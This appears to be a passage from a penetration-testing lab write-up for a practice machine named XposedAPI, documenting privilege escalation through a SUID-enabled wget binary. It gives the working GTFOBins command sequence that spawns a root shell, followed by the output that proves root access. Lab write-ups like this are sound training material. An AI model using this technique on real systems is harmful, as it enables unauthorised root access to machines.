SUID wget
The target system has wget with SUID bit set. This was also picked up by PEAS
/Practice/XposedAPI/5-Privilege_Escalation/attachments/{775B51FE-DCB5-4FB6-B300-030996933E4E}.png)
According to GTFOBins, this can be a privilege escalation vector
clumsyadmin@xposedapi:~$ TF=$(mktemp)
clumsyadmin@xposedapi:~$ chmod +x $TF
clumsyadmin@xposedapi:~$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
clumsyadmin@xposedapi:~$ wget --use-askpass=$TF 0
# whoami
root
# hostname
xposedapi
# /sbin/ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.209.134 netmask 255.255.255.0 broadcast 192.168.209.255
ether 00:50:56:9e:12:67 txqueuelen 1000 (Ethernet)
RX packets 2832 bytes 204166 (199.3 KiB)
RX errors 0 dropped 80 overruns 0 frame 0
TX packets 527 bytes 72747 (71.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise